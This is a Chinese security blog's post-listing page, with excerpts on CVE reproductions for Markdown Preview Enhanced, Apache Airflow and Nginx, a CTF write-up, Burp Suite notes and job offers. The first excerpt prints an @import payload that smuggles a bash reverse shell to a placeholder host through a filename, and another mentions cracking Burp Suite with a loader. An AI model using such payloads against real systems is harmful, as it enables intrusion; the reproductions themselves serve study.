摘要: CVE-2022-45025 Markdown Preview Enhanced插件预览漏洞复现 @import "$(bash -c 'bash -i >*& /dev/tcp/yourip/yourport 0>&1'| exit 0) Python.pdf" The following comment will be recognised by MPE as valid "@import" 阅读全文
posted @ 2022-12-16 12:30 sherlson 阅读(89) 评论(0) 推荐(0) 编辑
摘要: 偶尔在启动IDEA或PyCharm时,会遇到java.net.BindException: Address already in use: bind错误而无法启动。 解决办法 方式一: 重启电脑 可能会遇到多次重启电脑仍出现无法启动的情况,但是,一般绝对可行 方式二: 很多情况下,我们已经开启了很多 阅读全文
posted @ 2022-11-01 21:31 sherlson 阅读(436) 评论(0) 推荐(0) 编辑
摘要: 前提说明:该姿势并无安全问题,短密码生成的前提是知道原密码(即文中的长密码) 前景提要 Positive Technologies 的网络安全研究员 Arseniy Sharoglazov 近日在社交平台分享了一个简单的实验并指出,加密的 ZIP 文件可能存在两个正确的密码,并且都可以提取出相同的结 阅读全文
posted @ 2022-10-24 16:02 sherlson 阅读(164) 评论(0) 推荐(0) 编辑
摘要: CVE-2022-24288 apache airflow RCE漏洞复现分析 1. 漏洞环境 fofa key: title="Airflow - DAGs" || body="Apache Airflow" 采用本地搭建漏洞测试环境 # 获取yaml文档 curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2. 阅读全文
posted @ 2022-10-09 16:46 sherlson 阅读(734) 评论(0) 推荐(0) 编辑
摘要: 转载-Burp Suite Intruder模块简介 本文转载于[Burp Suite完整教程] Intruder Attack type和Payloads – 拥有上千种姿态的攻击模式 转载本文的原因是,在实战过程中,利用Burp Suite同时探测内网C段和端口的姿势不够熟悉,转载了一篇比较完善的文章,用于自己学习,顺便记录一下。 今天要介绍Int 阅读全文
posted @ 2022-08-10 10:34 sherlson 阅读(156) 评论(0) 推荐(1) 编辑
摘要: 工具配置-无法双击打开jar文件 0x00、发现问题 重装Burp Suite时发现,使用burploader.jar进行注册破解,突然发现无法打开jar文件。 0x01、排查环境变量 首先排查JDK的环境变量,查看JAVA_HOME、CLASSPATH、PATH中的环境变量: JAVA_HOME: E:\openJDK\jdk11 阅读全文
posted @ 2022-08-09 15:13 sherlson 阅读(252) 评论(0) 推荐(0) 编辑
摘要: CVE-2017-7529 本文首发于freebuf Nginx安全性分析 影响版本:0.5.6-1.13.2 漏洞危害:敏感信息泄露 HTTP-Range HTTP的Range 允许客户端分批次请求资源的一部分,如果服务端资源较大,可以通过Range来并发下载;如果访问资源时网络中断,可以断点续传 阅读全文
posted @ 2022-06-18 15:07 sherlson 阅读(1560) 评论(0) 推荐(0) 编辑
摘要: 复现-2020 网鼎杯 青龙组 AreUSerialz 复现 题目给定了以下源码: <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function _ 阅读全文
posted @ 2022-06-15 12:20 sherlson 阅读(77) 评论(0) 推荐(0) 编辑
摘要: 一些常用的沙箱检测 微步沙盒: https://s.threatbook.cn/ 腾讯哈勃分析系统: https://habo.qq.com/ ==》要md5,GG!!!还是算了,不太友好!!! 魔盾: https://www.maldun.com/analysis/ 微点沙盒: https://s 阅读全文
posted @ 2022-06-02 20:01 sherlson 阅读(52) 评论(0) 推荐(0) 编辑
摘要: 目前4个offer了,说明一下状况: 安恒信息 杭州 安恒云部门 安恒信息 北京 安全服务部门 奇安信 重庆 安全服务部门 中安网星 北京 安全部门 由于疫情因素,个人不是很想去北京,不过中安网星可以远程,还给配电脑,因为不是很了解中安网星,所以还是去安恒信息了。 阅读全文
posted @ 2022-05-12 13:30 sherlson 阅读(162) 评论(3) 推荐(0) 编辑